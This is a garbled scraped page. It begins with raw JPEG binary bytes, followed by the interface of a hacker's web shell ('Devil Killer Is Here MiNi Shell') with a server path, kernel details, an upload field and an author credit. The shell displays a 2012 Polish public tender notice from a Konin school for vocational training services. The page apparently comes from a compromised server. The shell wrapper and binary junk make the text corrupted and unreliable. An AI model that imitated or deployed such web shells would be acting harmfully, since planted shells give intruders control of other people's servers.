JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120814/175661-N-2012.html

<p class="kh_header"><b>Konin: Zorganizowanie i przeprowadzenie  usług edukacyjnych w zakresie realizacji zajęć zawodowych, zajęć ogólnokształcących, praktyk zawodowych, kursów zawodowych, obozów edukacyjnych i indywidualnych zajęć z uczniami w ramach projektu pn: Zawodowcy z Kopernika</b><br>
<b>Numer ogłoszenia: 175661 - 2012; data zamieszczenia: 14.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół  im. M. Kopernika , al. 1 Maja 22, 62-510 Konin, woj. wielkopolskie, tel. 0-63242 45 57, faks 0-63 242 66 26.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopernik.konin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zespół  Szkół  im. Mikołaja  Kopernika w Koninie.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie  usług edukacyjnych w zakresie realizacji zajęć zawodowych, zajęć ogólnokształcących, praktyk zawodowych, kursów zawodowych, obozów edukacyjnych i indywidualnych zajęć z uczniami w ramach projektu pn: Zawodowcy z Kopernika.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Zorganizowanie i przeprowadzenie  usług edukacyjnych w zakresie realizacji zajęć zawodowych, zajęć ogólnokształcących, praktyk zawodowych, kursów zawodowych, obozów edukacyjnych i indywidualnych zajęć z uczniami  w ramach projektu pn: Zawodowcy z Kopernika
Szkolenia adresowane są do osób będących uczniami technikum i zasadniczej szkoły zawodowej z oddziałami integracyjnymi.
Zakres tematyczny usług: 
Lp	Zadanie przedmiotu zamówienia	Beneficjenci 	Liczba uczestników razem	  Liczba grup	Ilość godzin na 1 grupę	Ilość godzin łącznie
1.Realizacja zajęć z przedmiotu: Pracownia ekonomiczna	uczniowie klas: technik ekonomista	62	2	160	320
2.Realizacja zajęć z przedmiotu: Rachunkowość	uczniowie klas: technik ekonomista	62	2	160	320
3.Realizacja zajęć z przedmiotu: Ochrona wód	uczniowie klas: technik ochrony środowiska	60	2	80	160
4.Realizacja zajęć z przedmiotu: Ochrona powietrza oraz przed hałasem i drganiami	uczniowie klas: technik ochrony środowiska	60	2	80	160
5.Realizacja zajęć z przedmiotu: Gospodarowanie odpadami	uczniowie klas: technik ochrony środowiska	60	2	80	160
6.Realizacja zajęć z przedmiotu: Pracownia badań laboratoryjnych ochrony środowiska	uczniowie klas: technik ochrony środowiska	60	4	40	160
7.Realizacja zajęć z przedmiotu: Podstawy żywienia człowieka	uczniowie klas zasadniczej szkoły zawodowej z oddziałami integracyjnymi, zawód kucharz małej gastronomii	50	3	40	120
8.Realizacja zajęć z przedmiotu: Technologia gastronomiczna	uczniowie klas zasadniczej szkoły zawodowej z oddziałami integracyjnymi, zawód kucharz małej gastronomii	50	3	40	120
9.Realizacja zajęć z przedmiotu: Podstawy rachunkowości gastronomicznej	uczniowie klas zasadniczej szkoły zawodowej z oddziałami integracyjnymi, zawód kucharz małej gastronomii	50	3	40	120
10.Towaroznawstwo	uczniowie klas zasadniczej szkoły zawodowej z oddziałami integracyjnymi, zawód sprzedawca	31	2	160	320
11.Realizacja zajęć z przedmiotu: Organizacja sprzedaży	uczniowie klas zasadniczej szkoły zawodowej z oddziałami integracyjnymi, zawód sprzedawca	31	2	160	320
12.Realizacja zajęć z przedmiotu: Podstawy działalności handlowej	uczniowie klas zasadniczej szkoły zawodowej z oddziałami integracyjnymi, zawód sprzedawca	31	2	160	320
13.Realizacja zajęć: język angielski	uczniowie klas: technik ekonomista, technik ochrony środowiska; uczniowie klas zasadniczej szkoły zawodowej z oddziałami integracyjnymi, zawód sprzedawca, kucharz małej gastronomii	203	9	26,67	240
14.Realizacja zajęć z przedmiotu: Techniki uczenia się	uczniowie klas: technik ekonomista, technik ochrony środowiska; uczniowie klas zasadniczej szkoły zawodowej z oddziałami integracyjnymi, zawód sprzedawca, kucharz małej gastronomii	203	9	26,67	240
15.Realizacja zajęć z przedmiotu: Komunikacja interpersonalna	uczniowie klas: technik ekonomista, technik ochrony środowiska; uczniowie klas zasadniczej szkoły zawodowej z oddziałami integracyjnymi, zawód sprzedawca, kucharz małej gastronomii	203	9	26,67	240
16.Realizacja kursu: Księgowość komputerowa	uczniowie klas: technik ekonomista	15	1	70	70
17.Realizacja kursu: Kadry płace	uczniowie klas: technik ekonomista	15	1	90	90
18.Realizacja kursu: Prowadzenie ksiąg przychodów i rozchodów	uczniowie klas: technik ekonomista	15	1	70	70
19.Realizacja kursu: Własna działalność	uczniowie klas: technik ekonomista	32	2	30	60
20.Realizacja kursu: Zielona gospodarka - technologie odnawialnych źródeł energii	uczniowie klas: technik ochrony środowiska	30	2	20	40
21.Realizacja kursu: Prawo i ekonomia w ochronie środowiska	uczniowie klas: technik ochrony środowiska	15	2	15	30
22.Realizacja kursu: Dietetyk	uczniowie klas zasadniczej szkoły zawodowej z oddziałami integracyjnymi, zawód kucharz małej gastronomii	16	1	30	30
23.Realizacja kursu: Barman	uczniowie klas zasadniczej szkoły zawodowej z oddziałami integracyjnymi, zawód kucharz małej gastronomii	15	1	20	20
24.Realizacja kursu: Kelner	uczniowie klas zasadniczej szkoły zawodowej z oddziałami integracyjnymi, zawód kucharz małej gastronomii	19	1	20	20
25.Realizacja kursu: Obsługa kasy fiskalnej	uczniowie klas zasadniczej szkoły zawodowej z oddziałami integracyjnymi, zawód sprzedawca	16	1	12	12
26.Realizacja indywidualnych zajęć z uczniami niepełnosprawnymi	uczniowie klas zasadniczej szkoły zawodowej z oddziałami integracyjnymi, zawód kucharz małej gastronomii i sprzedawca	5	5	72	360

Lp.	Zadanie przedmiotu zamówienia	Beneficjenci 	Liczba uczestników razem	 Liczba grup	Ilość  osobodni na 1 grupę	Ilość osobodni łącznie
27.Realizacja praktyki zawodowej	uczniowie klas: technik ekonomista	62	2	620	1240
28.Realizacja praktyki zawodowej	uczniowie klas: technik ochrony środowiska	60	2	600	1200
29.Realizacja praktyki zawodowej	uczniowie klas zasadniczej szkoły zawodowej z oddziałami integracyjnymi, zawód kucharz małej gastronomii	50	3	333,33	1000
30.Realizacja praktyki zawodowej	uczniowie klas zasadniczej szkoły zawodowej z oddziałami integracyjnymi, zawód sprzedawca	31	2	310	620

Lp.	Zadanie przedmiotu zamówienia	Beneficjenci	Liczba uczestników razem	Liczba grup	Ilość  osobodni na 1 grupę	Ilość osobodni łącznie
31.Realizacja obozu młodego ekonomisty	uczniowie klas: technik ekonomista	62	2	5	310
32.Realizacja obozu młodego ekologa	uczniowie klas: technik ochrony środowiska	60	2	5	300

Lp.	Zadanie przedmiotu zamówienia	Beneficjenci	Liczba uczestników razem	Liczba grup	Ilość  godzin na 1 grupę	Ilość godzin łącznie
33.Szkolenie nauczycieli do realizacji zajęć z uczniami niepełnosprawnymi	nauczyciele	5	1	40	40.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.21.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza w niniejszym zakresie szczegółowego warunku.  Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie oświadczenia o spełnianiu warunków zawartych w art.22 ust.1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował, a w przypadku świadczeń okresowych lub ciągłych realizuje: 
a)samodzielnie lub we współpracy minimum 2 projekty EFS w ramach priorytetu IX
b)minimum 3 zadania w ramach projektów unijnych priorytetu IX
c) minimum 1 zadanie polegające na przeprowadzeniu szkolenia o charakterze zawodowym dla uczniów szkoły ponadgimnazjalnej w wymiarze co najmniej 200 godzin 
d)minimum 3 kursy z języka obcego dla uczniów szkoły ponadgimnazjalnej
e)opracował minimum 3 innowacyjne programy nauczania dla uczniów szkoły ponadgimnazjalnej
f)przeprowadził minimum 1 kurs dla osób niepełnosprawnych
Ocena spełniania ww. warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie dokumentu określonego w części III pkt.4.1 W przypadku składania oferty wspólnej warunek zostanie uznany przez zamawiającego za spełniony, jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania warunku. Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie oświadczenia o spełnianiu warunków zawartych w art.22 ust.1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca będzie dysponował osobami zdolnymi
do wykonania  zamówienia tj:  
a)osobami, które posiadają wykształcenie wyższe co najmniej magisterskie zgodne z przedmiotem zamówienia i kwalifikacje pedagogiczne - minimum 29 osób, tj. po jednej na każde zadanie przedmiotu zamówienia  w tym dla praktyk zawodowych - min. 1 osoba i obozów - min.1 osoba,
b)osobami, które posiadają doświadczenie wyrażające się przeprowadzeniem minimum jednego zadania o tematyce objętej niniejszym zamówieniem, minimum 29 osób, tj. po jednej na każde zadanie przedmiotu zamówienia w tym dla praktyk zawodowych - min. 1 osoba i obozów - min.1 osoba, Ocena spełniania warunku dokonana  zostanie zgodnie z formułą  spełnia - nie spełnia na  podstawie dokumentu określonego w części III pkt. 4.1.
W   przypadku   składania   oferty   wspólnej   warunek zostanie uznany przez zamawiającego za spełniony,  jeżeli   wykonawcy składający ofertę wspólną będą spełniać go łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca:
a) posiada środki finansowe lub zdolność kredytową nie mniejszą  niż 100.000,00 zł, 
b) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności   związanej z przedmiotem zamówienia na  kwotę  minimum 200.000,00 zł.
Ocena spełniania warunku dokonana  zostanie zgodnie z formułą  spełnia - nie spełnia  na podstawie dokumentów  określonych  w części III pkt. 4.1.
W przypadku składania oferty wspólnej warunek zostanie uznany przez zamawiającego za spełniony ,   jeżeli : 
a) wykonawcy składający ofertę wspólną będą spełniać go łącznie. 
b)  przynajmniej jeden z wykonawców wykonawcy składający ofertę wspólną będzie go spełniał.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Wiarygodność wykonawcy - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany warunków umowy w następujących  przypadkach: 
- zmiany osób prowadzących zajęcia pod warunkiem, że osoba zastępująca spełni  określone  przez Zamawiającego wymagania określone w SIWZ; 
- ustawowej zmiany wysokości podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopernik.konin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ (49,00 zł,-) można też odebrać w siedzibie zamawiającego Konin ul. Aleje 1-go Maja 22 pok.sekretariat lub za zaliczeniem pocztowym do dnia  22.08.2012 r.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.08.2012 godzina 08:15, miejsce: Siedziba zamawiającego Konin Aleje 1 Maja 22 , pokój - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  Nr  POKL.09.02.00-30-113-11  jest współfinansowany z Europejskiego Funduszu 
Społecznego w ramach Programu Operacyjnego Kapitał  Ludzki, Priorytet IX Rozwój 
Wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com